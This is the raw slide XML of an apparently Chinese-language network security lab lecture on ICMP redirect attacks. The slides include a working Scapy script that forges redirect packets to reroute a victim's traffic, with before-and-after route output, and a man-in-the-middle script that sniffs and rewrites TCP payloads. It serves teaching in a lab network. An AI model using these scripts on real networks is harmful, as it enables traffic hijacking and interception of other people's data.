          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="2483768" y="3673746"/>
            <a:ext cx="936104" cy="1499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FF38212-3A3B-450B-B3D1-221FAEF2B659}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="323528" y="3187582"/>
            <a:ext cx="2160240" cy="313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83499-A297-45C4-9E4C-21B2704B294D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2987824" y="31104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重定向类型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922D4F-653B-4EB4-B7FF-C1BE0EA88F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55776" y="3295123"/>
            <a:ext cx="43204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DA5FEA0-E79F-4CD4-AF78-55ADB459CC6D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2339752" y="2852936"/>
            <a:ext cx="2664296" cy="19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161D97-39C6-4930-854B-3E6F2FA1873F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3469814" y="35090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新网关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B4BF1B-E8B9-4D0F-80EF-500B7CDCDF74}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="5076056" y="2996952"/>
            <a:ext cx="288032" cy="55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8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1" grpId="0" animBg="1"/>
      <p:bldP spid="12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F9A80965-789A-42DE-BF04-E4BF543DB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ICMP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>重定向报文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7512E-8B86-444C-A812-41E54999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Type:5</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Code: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Gw</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>：新网关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434DE27-F255-4627-887E-831190B8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9315"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="665128" y="2996952"/>
          <a:ext cx="24687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64">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1177127461"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1779824">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="273984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23835"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl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A419FBE-21C1-42AD-86E4-00BCF87A5FBC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="5043715" y="4026664"/>
            <a:ext cx="0" cy="4104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62505A5-482D-4E72-A087-3653807685D5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="3894762" y="4026664"/>
            <a:ext cx="11489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D7F686-3A88-48DF-997B-D5C2BBA7B6AC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="3894762" y="3655824"/>
            <a:ext cx="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8C02881-C785-4599-B65E-7D7CD922313A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4486257" y="5319588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原来路由：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B: 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R1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BF8FDD7-9D9E-4639-B2B6-C6207E2B22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5563" y="3717031"/>
            <a:ext cx="1080123" cy="1080122"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 97700"/>
            </a:avLst>
          </a:prstGeom>
          <a:ln w="34925">
            <a:solidFill>
              <a:srgbClr val="D995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A6D240F-C6E3-496B-966B-B135CAA4986B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2771800" y="471972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ICMP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>重定向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B: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F749D04-DBC4-4FA6-AD6F-A4769C178EE7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="5187731" y="2420888"/>
            <a:ext cx="1224136" cy="79208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B5EA0E50-2F2E-490C-BDE7-350BC47E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96" y="2692408"/>
            <a:ext cx="776288" cy="942975"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic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84B16333-74BE-40B8-B5B5-23B4BA7C97F0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065681" y="2901446"/>
            <a:ext cx="1221222" cy="2689096"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector2">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="25400">
            <a:solidFill>
              <a:srgbClr val="D995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文本框 577">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4976460D-A5AE-4173-B710-6097CD70E579}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6551372" y="454624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ICMP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>重定向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B: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Attack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19D2A3-9D31-42CD-B83E-B042B124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531" y="1916832"/>
            <a:ext cx="3890963" cy="337185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061639D-365E-4F05-B8F3-F8DF1BB2A4F7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3923928" y="3655824"/>
            <a:ext cx="0" cy="37084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C6E9AF-A5E8-46CA-92F3-00BD04636F39}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3923928" y="4026664"/>
            <a:ext cx="2664296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649E6D4-B9A2-4562-9855-10842A9B7869}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="6588224" y="3573016"/>
            <a:ext cx="0" cy="4536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33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8C57-370B-4060-930D-2577D64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重定向攻击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8D393-EC80-4779-A1BF-55BE5ACB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84712"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>攻击代码</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="438150" lvl="1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#!/usr/bin/env python3</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="438150" lvl="1" indent="0">
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft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scapy.all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*</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="438150" lvl="1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Remember to run the following command on victim</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="438150" lvl="1" indent="0">
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft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sysctl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net.ipv4.conf.all.accpt_redirects=1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="438150" lvl="1" indent="0">
              <a:buNone/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IP(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='10.0.2.1',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='10.0.2.7')</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="438150" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR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 = ICMP(type=5, code=1)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="438150" lvl="1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icmp.gw = '10.0.2.6'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lvl="1" indent="0">
              <a:spcBef>
                <a:spcPts val="120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 = IP(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='10.0.2.7',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='1.2.3.4')</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="438150" lvl="1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send(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/ip2/ICMP());</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>执行结果</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="438150" lvl="1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Server(10.0.2.7):$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 get 1.2.3.4</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="438150" lvl="1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1.2.3.4 via 10.0.2.1 dev ens33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10.0.2.7 cache</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="438150" lvl="1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Server(10.0.2.7):$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 get 1.2.3.4</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="438150" lvl="1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1.2.3.4 via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10.0.2.6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dev ens33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10.0.2.7 cache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E3CCC2-79A6-438D-8DFF-D7B52319B395}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6225009" y="4557365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10.0.2.7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6DA86E-3704-437C-A717-5AD77B4C1DF6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5144889" y="2973189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10.0.2.1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6C974D-47B0-44D3-899A-09F63AA1A495}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7347691" y="3544986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10.0.2.6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90BFD1-47AB-443E-B942-61926CB134FA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6221320" y="1844824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1.2.3.4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2E3329-B6C0-418E-840F-27079308B85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5792961" y="3405237"/>
            <a:ext cx="1080120" cy="1152128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AFC3DA5-E80E-4DE6-8A13-77E79822E904}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4355976" y="4147600"/>
            <a:ext cx="1941041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原始报文：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>10.0.2.7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1.2.3.4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D21883-96E0-4B0D-A0F6-92BD12A125A0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6221320" y="3477245"/>
            <a:ext cx="939793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845A979-C916-4840-925C-9F5C060AC8F8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5470512" y="3326070"/>
            <a:ext cx="19410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10.0.2.7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1.2.3.4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C5B22-121F-49A4-9E97-9DA82DDEEE55}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4559043" y="3326070"/>
            <a:ext cx="90802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重定向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5F096-CA09-4E5C-9D2E-B6F8FFAC46E7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="7377137" y="3977034"/>
            <a:ext cx="288032" cy="580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B42F-E268-4D03-B2FB-B52AF8E8EF35}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7517464" y="4152029"/>
            <a:ext cx="13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后续的报文</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3314582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28 -0.0456 L -0.04028 -0.04537 C -0.03959 -0.04884 -0.03872 -0.05185 -0.0382 -0.05509 C -0.03785 -0.05717 -0.03785 -0.05972 -0.03733 -0.06204 C -0.03664 -0.06528 -0.03542 -0.06852 -0.03473 -0.07176 C -0.03369 -0.07592 -0.03299 -0.07986 -0.03212 -0.08403 C -0.03195 -0.08842 -0.03178 -0.09282 -0.0316 -0.09722 C -0.03143 -0.11597 -0.0316 -0.13449 -0.03125 -0.15301 C -0.03125 -0.15509 -0.029 -0.15972 -0.02865 -0.16111 C -0.02813 -0.16296 -0.02778 -0.1662 -0.02691 -0.16805 C -0.0257 -0.17037 -0.02344 -0.17361 -0.02257 -0.17685 C -0.02223 -0.17801 -0.02188 -0.1794 -0.02171 -0.18079 C -0.02136 -0.1831 -0.02153 -0.18565 -0.02084 -0.18773 C -0.02032 -0.18912 -0.01928 -0.19004 -0.01858 -0.1912 C -0.01789 -0.19444 -0.01754 -0.19629 -0.01511 -0.1993 L -0.01129 -0.20463 L -0.0099 -0.20625 C -0.00973 -0.20694 -0.00955 -0.20741 -0.00955 -0.2081 C -0.00938 -0.20903 -0.00921 -0.20995 -0.00903 -0.21088 C -0.00886 -0.21204 -0.00851 -0.21296 -0.00816 -0.21389 C -0.00799 -0.21666 -0.00799 -0.21921 -0.00782 -0.22199 C -0.00764 -0.22384 -0.00782 -0.22592 -0.0073 -0.22778 C -0.00678 -0.23009 -0.00591 -0.23194 -0.00521 -0.23403 C -0.00157 -0.24352 -0.0033 -0.23796 0.00086 -0.24815 C 0.00243 -0.25185 0.00416 -0.25741 0.00607 -0.26088 C 0.00833 -0.26458 0.01128 -0.26713 0.01302 -0.27129 C 0.01684 -0.27963 0.01961 -0.28634 0.02447 -0.29444 C 0.02673 -0.29838 0.02934 -0.30185 0.03142 -0.30602 C 0.03402 -0.31134 0.03611 -0.31713 0.03836 -0.32291 C 0.04079 -0.32963 0.0401 -0.32824 0.04357 -0.33495 C 0.04427 -0.33634 0.04479 -0.33773 0.04566 -0.33912 C 0.04704 -0.34097 0.05104 -0.34398 0.05225 -0.34491 C 0.05277 -0.34514 0.05659 -0.34745 0.05781 -0.34884 C 0.05937 -0.35069 0.06006 -0.35162 0.06093 -0.35416 C 0.06197 -0.35671 0.06059 -0.35509 0.06215 -0.35764 C 0.06267 -0.35833 0.06319 -0.35879 0.06354 -0.35926 C 0.06475 -0.36134 0.06458 -0.36111 0.06527 -0.36273 L 0.06736 -0.36157 L 0.06736 -0.36134 L 0.06927 -0.36111 " pathEditMode="relative" rAng="0" ptsTypes="AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA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00046 C 0.00521 0.00694 0.01111 0.01203 0.01597 0.02199 C 0.02622 0.04259 0.03576 0.0655 0.04462 0.09004 C 0.04549 0.09236 0.04635 0.09513 0.04722 0.09699 C 0.06094 0.12662 0.04601 0.08958 0.05868 0.12569 C 0.05955 0.128 0.0691 0.153 0.0717 0.1618 C 0.07934 0.18912 0.07309 0.1699 0.07865 0.19143 C 0.07934 0.19375 0.08021 0.1956 0.08073 0.19861 C 0.08142 0.20092 0.08194 0.20416 0.08247 0.20648 C 0.08299 0.20879 0.08385 0.21018 0.0842 0.2125 C 0.08681 0.22476 0.08403 0.21782 0.08733 0.2243 C 0.08767 0.22708 0.08802 0.22986 0.08854 0.2324 C 0.08906 0.23379 0.08993 0.23379 0.09028 0.23472 C 0.0908 0.23611 0.0908 0.23842 0.09115 0.23935 C 0.09201 0.24213 0.09323 0.24213 0.09427 0.24305 C 0.09549 0.24629 0.09479 0.2449 0.09653 0.24699 L 0.09549 0.24699 " pathEditMode="relative" rAng="0" ptsTypes="AAAAAAAAAAAAAAAA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1233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0023 C 0.00521 0.00694 0.01112 0.01203 0.01598 0.02199 C 0.02622 0.04236 0.03577 0.0655 0.04462 0.09004 C 0.04549 0.09213 0.04636 0.09513 0.04723 0.09699 C 0.06094 0.12662 0.04601 0.08958 0.05868 0.12546 C 0.05955 0.128 0.0691 0.15277 0.07171 0.1618 C 0.07934 0.18912 0.07309 0.16967 0.07865 0.1912 C 0.07934 0.19375 0.08021 0.1956 0.08073 0.19838 C 0.08143 0.20069 0.08195 0.20416 0.08247 0.20625 C 0.08299 0.20879 0.08386 0.21018 0.08421 0.2125 C 0.08681 0.22453 0.08403 0.21759 0.08733 0.22407 C 0.08768 0.22708 0.08802 0.22986 0.08855 0.23217 C 0.08907 0.23356 0.08993 0.23356 0.09028 0.23449 C 0.0908 0.23611 0.0908 0.23842 0.09115 0.23912 C 0.09202 0.24213 0.09323 0.24213 0.09427 0.24305 C 0.09549 0.24629 0.0948 0.2449 0.09653 0.24699 L 0.09549 0.24699 " pathEditMode="relative" rAng="0" ptsTypes="AAAAAAAAAAAAAAAA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AD30-B891-4570-9BD4-6F67C09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重定向问题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257DA-3E8D-4C10-8C10-EF97CD1A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：可以从远程主机发送</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>ICMP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>重定向吗？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：可以用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>ICMP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>重定向攻击将路由重定向到远程主机吗？</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="598627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99914-6BD3-4CF4-A98A-7DF8BAC0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利用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0"/>
              <a:t>ICMP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>重定向进行中间人（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0"/>
              <a:t>MITM</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>）攻击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F1C08-4116-4E7A-99C2-5E53EA24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4" y="1752600"/>
            <a:ext cx="7993063" cy="4700736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#!/usr/bin/env python3 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scapy.all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* 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def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spoof_pkt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(pkt): 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IP(bytes(pkt[IP]))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newpkt.chksum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[TCP].payload)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[TCP].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chksum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pkt[TCP].payload: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data = pkt[TCP].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payload.load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print("*** %s, length: %d" % (data, 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(data)))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# Replace a pattern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47750"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newdata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data.replace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b’seedlabs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 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b’AAAAAAAA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 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1047750"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send(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newdata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else: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send(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1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= ‘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pkt = sniff(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iface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=’eth0’, filter=f, prn=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spoof_pkt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5155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noProof="1" smtClean="0"/>
              <a:pPr lvl="0"/>
              <a:t>9</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US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32A5C-A62F-4641-9F36-B0681B93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56792"/>
            <a:ext cx="8869367" cy="43924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3C0B95-AF08-43ED-8F30-CCD6646FC83E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7308304" y="58005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恶意路由器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4F2501-663E-407C-BA5F-7005DB05F03C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6660232" y="15567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攻击者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1A956-32BC-4BC5-8925-F6892961634C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7766235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受害者</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="23466841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主题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</Template>
  <TotalTime>15827</TotalTime>
  <Words>969</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>全屏显示(4:3)</PresentationFormat>
  <Paragraphs>136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굴림</vt:lpstr>
      <vt:lpstr>黑体</vt:lpstr>
      <vt:lpstr>华文楷体</vt:lpstr>
      <vt:lpstr>微软雅黑</vt:lpstr>
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Times New Roman</vt:lpstr>
      <vt:lpstr>Verdana</vt:lpstr>
      <vt:lpstr>Wingdings</vt:lpstr>
      <vt:lpstr>Wingdings 2</vt:lpstr>
      <vt:lpstr>主题</vt:lpstr>
      <vt:lpstr>4_색종이 상자</vt:lpstr>
      <vt:lpstr>8_색종이 상자</vt:lpstr>
      <vt:lpstr>11_색종이 상자</vt:lpstr>
      <vt:lpstr>实验3 ICMP重定向攻击</vt:lpstr>
      <vt:lpstr>主要内容</vt:lpstr>
      <vt:lpstr>回顾上一次实验</vt:lpstr>
      <vt:lpstr>ICMP重定向报文</vt:lpstr>
      <vt:lpstr>ICMP重定向报文</vt:lpstr>
      <vt:lpstr>ICMP重定向攻击</vt:lpstr>
      <vt:lpstr>ICMP重定向问题</vt:lpstr>
      <vt:lpstr>2. 利用ICMP重定向进行中间人（MITM）攻击</vt:lpstr>
      <vt:lpstr>网络环境搭建</vt:lpstr>
      <vt:lpstr>实验环境</vt:lpstr>
      <vt:lpstr>docker容器的使用</vt:lpstr>
      <vt:lpstr>网络环境搭建</vt:lpstr>
      <vt:lpstr>环境其它配置</vt:lpstr>
      <vt:lpstr>实验任务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系统漏洞扫描原理介绍</dc:title>
  <dc:creator>YuanZhi</dc:creator>
  <cp:lastModifiedBy>wer_sec@qq.com</cp:lastModifiedBy>
  <cp:revision>241</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2003-06-23T13:22:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-04-07T04:34:05Z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7</vt:r8>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="3" name="KSOProductBuildVer">
    <vt:lpwstr>2052-11.1.0.9584</vt:lpwstr>
  </property>
</Properties>
</file>